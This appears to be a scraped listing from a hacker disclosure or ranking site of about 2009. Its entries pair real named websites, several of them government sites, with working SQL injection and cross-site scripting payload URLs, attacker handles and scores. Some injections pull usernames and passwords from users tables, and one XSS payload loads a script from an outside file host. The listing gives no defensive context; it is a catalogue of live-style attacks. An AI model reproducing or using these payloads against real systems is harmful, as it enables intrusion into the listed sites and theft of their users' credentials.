1
10.09.09
nr3c.gov.pk
/blog.php?blog_id=-2 union all select 1,2,3,group_concat(password,0x3a,realname,0x3a,use rname),5,6,7 from users--
SQLi
Evox
900000000
50000
Vuln
2
27.09.09
europe.majestic.aero
/*******.php?id=9+UNION+SELECT+1,2,3,4,5,@@version, 7,null,9/*
SQLi
l0rdn1
2500
10000
Vuln
3
27.09.09
www.mtv.com
/games/arcade/game/play.jhtml?arcadeGameId=10141651"></script><script>*****("XSS");< ;/script>
XSS
NeX
50000
9999
Vuln
4
27.09.09
www.moph.gov.af
/en/news.php?id=-119+union+all+select+1,@@version,3,4,5,6,7,8,9,10, 11,12,13--
SQLi
NeX
20000
9000
Vuln
5
10.05.09
www.ajkmdrp.gov.pk
/videos_show.php?id=-20 union all select 1,@@version,3,4--
SQL1
und3rcore
10000
8700
Vuln
6
10.12.09
www.onf-nfb.gc.ca
/eng/nouvelles/index.php?id=-1875 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12, 13 from information_schema.tables where table_schema=database()--
SQLi
Chernabog
19000
8600
Vuln
7
27.09.09
www.dms.gov.mv
/news.php?id=-29+union+select+1,2,3,4,5,6,7--
SQLi
NeX
400
8500
Vuln
8
27.09.09 09
www.xnxx.com
/?k=%3Cscript%3E*****(%27MDCCLXXVI%20[undersec.info]%27)%3B%3C%2Fscript%3E
XSS
Black-Angel
2000
8000
Vuln
9
27.09.09
academy.security.gov.ge
/ENG/news.php?id=-142+union+all+select+1,2,3,4,5,@@version,7,8,9,10, 11,12,13,14,15,16--
SQLi
NeX
500
7800
Vuln
10
10.18.09
www.michaelyoun.com
/index.php?id=335%20union%20all%20select%201,concat (login,0x3a,pass),3,4,5,6%20from%20users--
SQLi
Chernabog
3500
7600
Vuln
11
27.09.09
www.ipswitch.com
/remove.asp?email='><script>*****('xssed Darkc0ke')</script>&action=verify
XSS
Darkc0ke
500
7500
Vuln
12
10.10.09
new.myfonts.com
/MailingList?email=<script>*****(
XSS
Darkc0ke
500
7300
Vuln
13
10.10.09
new.myfonts.com
/MailingList?email=<script>*****(
XSS
Darkc0ke
500
7300
Vuln
14
27.09.09
www.aceleraconasus.asus.com
/configurator/modelPopPup.php?id=111&name='><script> ;*****('xssed Darkc0ke')</script> configurator
XSS
Darkc0ke
750
7100
Vuln
15
10.19.09
www.diariodecuyo.com.ar
/participar/new_blogopin.php?blog_id=1&blogcomen_id=-1/**/and/**/1=0/**/union/**/all/**/select/**/1,2,@@versioin,4,5,6,7,8--
SQLi
X4lt
100
6000
Vuln
16
27.09.09
www.dassweb.com
/bizdir/directory.php?ax=list&sub=7&cat_id=-7 UNION ALL SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13--
SQLi
Darkc0ke
0
5250
Vuln
17
10.23.09
www.sacu.int
/search.asp?search=%27%27%22%3CSCRIPT/SRC=%22http://download13.mediafire.com/929ozncztizg/ijznuenvk0z/d4rkst4r.js%22%3E&submit=Search+%3E%3E&mod e=allwords
XSS
d4rkst4r
5000
5200
Vuln
18
10.04.09
www.aarda.org
/infocus_article.php?ID=-28 union all select 1,@@version,3,database(),5,6,7--
SQLi
Satan911
25
5100
Vuln
19
27.09.09
www.srbija.gov.rs
/vesti/dogadjaji.php?id=1516 and 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
SQLi
l0rdn1
500
5000
Vuln
20
10.14.09
www.cpaug.org
news.php?Id=5 union all select 1,concat(username,0x3a,password),3,4,5 from users/*
SQLi
trix
10
3800
Vuln